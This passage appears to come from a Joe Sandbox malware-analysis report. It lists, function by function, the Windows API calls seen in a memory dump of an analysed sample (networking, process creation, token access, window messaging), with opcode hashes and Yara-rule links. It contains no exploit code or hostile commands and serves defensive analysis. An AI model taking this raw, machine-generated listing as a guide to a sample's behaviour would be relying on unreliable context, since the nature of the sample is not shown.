                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: CloseControlCreateDeviceFileHandle_memset
                                          • String ID:
                                          • API String ID: 1157408455-0
                                          • Opcode ID: d48aa419134e5449774d16529e74c022a712185470bbd8bfeeea6ce1709e8088
                                          • Instruction ID: 8313ddadf310c2239499731be170c5c64d63f0ae8c8fee3b7495e596e37fc7c8
                                          • Opcode Fuzzy Hash: d48aa419134e5449774d16529e74c022a712185470bbd8bfeeea6ce1709e8088
                                          • Instruction Fuzzy Hash: 4F11AB759013287AD7309BA5AC4DFEBBB7CEF45B60F1045AAF908D7190D6744E808BA4
                                          Function 00126A54 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 000C402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00117E51,?,?,00000000), ref: 000C4041
                                            • Part of subcall function 000C402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00117E51,?,?,00000000,?,?), ref: 000C4065
                                          • gethostbyname.WSOCK32(?,?,?), ref: 00126A84
                                          • WSAGetLastError.WSOCK32(00000000), ref: 00126A8F
                                          • _memmove.LIBCMT ref: 00126ABC
                                          • inet_ntoa.WSOCK32(?), ref: 00126AC7
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                          • String ID:
                                          • API String ID: 1504782959-0
                                          • Opcode ID: 691c239393c2eefa9dc0f4f6e3535e18b8074bbf1d3f14bed1b5a066a91e7ab4
                                          • Instruction ID: bce9b8db80a655d65f39c2a74f98aba0ab5ceb6f63d722983cb6bafe2c7e2a4c
                                          • Opcode Fuzzy Hash: 691c239393c2eefa9dc0f4f6e3535e18b8074bbf1d3f14bed1b5a066a91e7ab4
                                          • Instruction Fuzzy Hash: 9B115E76900109AFCB05EFA4DD86DEEB7B8AF19310B144065F506A72A3DF31AE14CBA1
                                          Function 000B166C Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 000B29E2: GetWindowLongW.USER32(?,000000EB), ref: 000B29F3
                                          • DefDlgProcW.USER32(?,00000020,?), ref: 000B16B4
                                          • GetClientRect.USER32(?,?), ref: 000EB93C
                                          • GetCursorPos.USER32(?), ref: 000EB946
                                          • ScreenToClient.USER32(?,?), ref: 000EB951
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Client$CursorLongProcRectScreenWindow
                                          • String ID:
                                          • API String ID: 4127811313-0
                                          • Opcode ID: bca99c1f6146d00e9fab0e970064d1b2290a292cf381119c8d7fafa91bf63e63
                                          • Instruction ID: 4479b03112feabb9ed7c72e869a45ffad9d2eb6b43fbd7058e93d6689e66668e
                                          • Opcode Fuzzy Hash: bca99c1f6146d00e9fab0e970064d1b2290a292cf381119c8d7fafa91bf63e63
                                          • Instruction Fuzzy Hash: FB113639A00019AFCB10EF98D899DFE77B8FB09301F940455FA51E7551D730BA91CBA1
                                          Function 001096F9 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00109719
                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0010972B
                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00109741
                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0010975C
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          • Opcode ID: 9269195ac182eab385e99429f124a3b263a8ca9ca2efd775500f72addb4bb490
                                          • Instruction ID: 5fa282000587dad00169333bbc53176b248873608f18e999d7ef1325914081f8
                                          • Opcode Fuzzy Hash: 9269195ac182eab385e99429f124a3b263a8ca9ca2efd775500f72addb4bb490
                                          • Instruction Fuzzy Hash: C011487A901218FFEB11DF95C984E9DBBB8FB48710F204091EA04B7290D771AE10DB90
                                          Function 000B2111 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 000B214F
                                          • GetStockObject.GDI32(00000011), ref: 000B2163
                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 000B216D
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: CreateMessageObjectSendStockWindow
                                          • String ID:
                                          • API String ID: 3970641297-0
                                          • Opcode ID: b1d99c418e525c679ed6e9592fce63f4273de73dbc861d87536fa43e390d5c4c
                                          • Instruction ID: d9e2d4ca80e5a90836188d5b9a8282d0d280da7a01a4c454ce3104b67dfb5e3c
                                          • Opcode Fuzzy Hash: b1d99c418e525c679ed6e9592fce63f4273de73dbc861d87536fa43e390d5c4c
                                          • Instruction Fuzzy Hash: E911ADB2101149BFDF124F94DC44EEB7BA9EF69394F050105FB0456120C731DCA0DBA1
                                          Function 00111941 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,001104EC,?,0011153F,?,00008000), ref: 0011195E
                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,001104EC,?,0011153F,?,00008000), ref: 00111983
                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,001104EC,?,0011153F,?,00008000), ref: 0011198D
                                          • Sleep.KERNEL32(?,?,?,?,?,?,?,001104EC,?,0011153F,?,00008000), ref: 001119C0
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: CounterPerformanceQuerySleep
                                          • String ID:
                                          • API String ID: 2875609808-0
                                          • Opcode ID: d25d72c092a4ce985ecff7480bae20153f5cfd846c115f7f82825179a8364fdd
                                          • Instruction ID: d5c00dbea091c6f79cddd0c205b4eb042bb5d556e2d5984a094baa31455afce5
                                          • Opcode Fuzzy Hash: d25d72c092a4ce985ecff7480bae20153f5cfd846c115f7f82825179a8364fdd
                                          • Instruction Fuzzy Hash: 34115A31C0061CEBCF089FA5D958BEEFB78FF09701F014066EA90B2240CB3096908B95
                                          Function 0013E1CE Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0013E1EA
                                          • LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 0013E201
                                          • RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 0013E216
                                          • RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 0013E234
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Type$Register$FileLoadModuleNameUser
                                          • String ID:
                                          • API String ID: 1352324309-0
                                          • Opcode ID: 59e3882d34e41340e6cbc5a4199b97400fe4e798e1bf691a0040a76ee9bd7243
                                          • Instruction ID: 916338a8c3619c2e8e6aef423f06a9367f833958bb975a77e6046414b70e73a7
                                          • Opcode Fuzzy Hash: 59e3882d34e41340e6cbc5a4199b97400fe4e798e1bf691a0040a76ee9bd7243
                                          • Instruction Fuzzy Hash: 181161B5205314DBE3308F51DD08F93BBFCEB04B10F108559A716D6590D7B1E5449FA1
                                          Function 000E71E7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                          • String ID:
                                          • API String ID: 3016257755-0
                                          • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                          • Instruction ID: 7db646e8c9d7fdf37307101b320764bfab7cad9fc818dcf03288e0cdbcafbc9c
                                          • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                          • Instruction Fuzzy Hash: 04014C7204818EBFCF165E86CC418EE3F62BB19354B588519FA1C68131D336C9B1AB91
                                          Function 0013B937 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetWindowRect.USER32(?,?), ref: 0013B956
                                          • ScreenToClient.USER32(?,?), ref: 0013B96E
                                          • ScreenToClient.USER32(?,?), ref: 0013B992
                                          • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0013B9AD
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ClientRectScreen$InvalidateWindow
                                          • String ID:
                                          • API String ID: 357397906-0
                                          • Opcode ID: e4737458c602b4514441c4472806946d4eba18fc008a84cc6c62d27313592d73
                                          • Instruction ID: afe5ae074dbcb37a0f32ae2ee4cb42caefe8d094c370c6bafc728492ba777abc
                                          • Opcode Fuzzy Hash: e4737458c602b4514441c4472806946d4eba18fc008a84cc6c62d27313592d73
                                          • Instruction Fuzzy Hash: DD1163B9D04209EFDB41CF99C884AEEBBF9FB49310F104156E915E3620E731AA618F50
                                          Function 0013BCA7 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 0013BCB6
                                          • _memset.LIBCMT ref: 0013BCC5
                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00178F20,00178F64), ref: 0013BCF4
                                          • CloseHandle.KERNEL32 ref: 0013BD06
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: _memset$CloseCreateHandleProcess
                                          • String ID:
                                          • API String ID: 3277943733-0
                                          • Opcode ID: c00aa19086afef6364bf4cacb80018b059bf96de4b04a738a5848f46206c584b
                                          • Instruction ID: c32355222da3b13e6190c9eb238f2fa3e7d8a2057016ac79fd457e6b89df99fd
                                          • Opcode Fuzzy Hash: c00aa19086afef6364bf4cacb80018b059bf96de4b04a738a5848f46206c584b
                                          • Instruction Fuzzy Hash: 0EF05EB26803047FE2502B65AC09FBB3E6DEB09754F004421FB0CE55A2DB72489087B9
                                          Function 00117195 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                          Download Yara Rule
                                          APIs
                                          • EnterCriticalSection.KERNEL32(?), ref: 001171A1
                                            • Part of subcall function 00117C7F: _memset.LIBCMT ref: 00117CB4
                                          • _memmove.LIBCMT ref: 001171C4
                                          • _memset.LIBCMT ref: 001171D1
                                          • LeaveCriticalSection.KERNEL32(?), ref: 001171E1
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: CriticalSection_memset$EnterLeave_memmove
                                          • String ID:
                                          • API String ID: 48991266-0
                                          • Opcode ID: 7feb741a2d75b3a311e5783d1a282502779e622fd2b870efdd6a21b84b1093f1
                                          • Instruction ID: 3b4c475a20e7ccfd55a5908e3218137b70b8d3ef6113fc61cb787ce92c14a8e4
                                          • Opcode Fuzzy Hash: 7feb741a2d75b3a311e5783d1a282502779e622fd2b870efdd6a21b84b1093f1
                                          • Instruction Fuzzy Hash: 38F0303A100100ABCB016F55DC85B8ABB29EF49360F04C061FE085E26BCB71A951DBB4
                                          Function 0013C3C4 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 000B16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 000B1729
                                            • Part of subcall function 000B16CF: SelectObject.GDI32(?,00000000), ref: 000B1738
                                            • Part of subcall function 000B16CF: BeginPath.GDI32(?), ref: 000B174F
                                            • Part of subcall function 000B16CF: SelectObject.GDI32(?,00000000), ref: 000B1778
                                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0013C3E8
                                          • LineTo.GDI32(00000000,?,?), ref: 0013C3F5
                                          • EndPath.GDI32(00000000), ref: 0013C405
                                          • StrokePath.GDI32(00000000), ref: 0013C413
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                          • String ID:
                                          • API String ID: 1539411459-0
                                          • Opcode ID: e3b0744b7152847d3ac88f69dbc5a2caef3b9f586be5378dc939ba314253ea58
                                          • Instruction ID: d65d51916182e330d40834443edb88ad972d8c93a826f669c2b96c775cdf9c34
                                          • Opcode Fuzzy Hash: e3b0744b7152847d3ac88f69dbc5a2caef3b9f586be5378dc939ba314253ea58
                                          • Instruction Fuzzy Hash: 0CF0BE35105218BADB236F51AC0DFCE3F69AF0A350F048000FB51624F283B45591DBE9
                                          Function 0010AA52 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0010AA6F
                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 0010AA82
                                          • GetCurrentThreadId.KERNEL32 ref: 0010AA89
                                          • AttachThreadInput.USER32(00000000), ref: 0010AA90
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                          • String ID:
                                          • API String ID: 2710830443-0
                                          • Opcode ID: f3ffa0143b6caa34006f65bb7f35215d4cff0b451ad7c75be08cf3b3e8ed520b
                                          • Instruction ID: c86b32bcc0d4502cd536e4263d70a52d570515f64edc501d2b7c51043d214462
                                          • Opcode Fuzzy Hash: f3ffa0143b6caa34006f65bb7f35215d4cff0b451ad7c75be08cf3b3e8ed520b
                                          • Instruction Fuzzy Hash: A0E03035641328B6DB225FA29D0CEDB3F1CEF167A1F408011FA0A854A0C7B18590CBA0
                                          Function 000B25F4 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetSysColor.USER32(00000008), ref: 000B260D
                                          • SetTextColor.GDI32(?,000000FF), ref: 000B2617
                                          • SetBkMode.GDI32(?,00000001), ref: 000B262C
                                          • GetStockObject.GDI32(00000005), ref: 000B2634
                                          • GetWindowDC.USER32(?,00000000), ref: 000EC1C4
                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 000EC1D1
                                          • GetPixel.GDI32(00000000,?,00000000), ref: 000EC1EA
                                          • GetPixel.GDI32(00000000,00000000,?), ref: 000EC203
                                          • GetPixel.GDI32(00000000,?,?), ref: 000EC223
                                          • ReleaseDC.USER32(?,00000000), ref: 000EC22E
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                          • String ID:
                                          • API String ID: 1946975507-0
                                          • Opcode ID: 9c5b023d2983f095cd794065ed1ea2aebc36c5defe9ef39f649752694407615f
                                          • Instruction ID: e73d7bbe9d792eb0c7e384693f8a30f0348a8f64471e73685bdfc8b3ec919a23
                                          • Opcode Fuzzy Hash: 9c5b023d2983f095cd794065ed1ea2aebc36c5defe9ef39f649752694407615f
                                          • Instruction Fuzzy Hash: CCE06535504284BFEB625F65AC09BD83B51EB0A731F04836AFB79580F1877245C0DB11
                                          Function 00109330 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCurrentThread.KERNEL32 ref: 00109339
                                          • OpenThreadToken.ADVAPI32(00000000,?,?,?,00108F04), ref: 00109340
                                          • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00108F04), ref: 0010934D
                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,00108F04), ref: 00109354
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: CurrentOpenProcessThreadToken
                                          • String ID:
                                          • API String ID: 3974789173-0
                                          • Opcode ID: 5002f61b74c8d941cdc59c8620787fd698d8f7af3cb98a092cbda6e70c2464e4
                                          • Instruction ID: 3e5cf9240a6db4760c6a8e843d944a179e5ab8fee617cf75cdb83d02d86d16fe
                                          • Opcode Fuzzy Hash: 5002f61b74c8d941cdc59c8620787fd698d8f7af3cb98a092cbda6e70c2464e4
                                          • Instruction Fuzzy Hash: B1E04F3A6012119FD7211FB25D0DB573BACBF5A791F108818B785CA0E0E6749484CB50
                                          Function 000F0679 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDesktopWindow.USER32 ref: 000F0679
                                          • GetDC.USER32(00000000), ref: 000F0683
                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 000F06A3
                                          • ReleaseDC.USER32(?), ref: 000F06C4
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: CapsDesktopDeviceReleaseWindow
                                          • String ID:
                                          • API String ID: 2889604237-0
                                          • Opcode ID: fa84b9dff6e195aff39eb0ba55de8bd45a0489444808e053c38ac916000d5df7
                                          • Instruction ID: f15b338c96f8f6b1ca58b7268fbde04c619b233e0bd7d09df5856ffaffc77ee2
                                          • Opcode Fuzzy Hash: fa84b9dff6e195aff39eb0ba55de8bd45a0489444808e053c38ac916000d5df7
                                          • Instruction Fuzzy Hash: 10E01A79800204EFCB129F61D808BAD7BF1EF8C350F128419FE5AE7621CB3885919F50
                                          Function 000F068D Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDesktopWindow.USER32 ref: 000F068D
                                          • GetDC.USER32(00000000), ref: 000F0697
                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 000F06A3
                                          • ReleaseDC.USER32(?), ref: 000F06C4
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
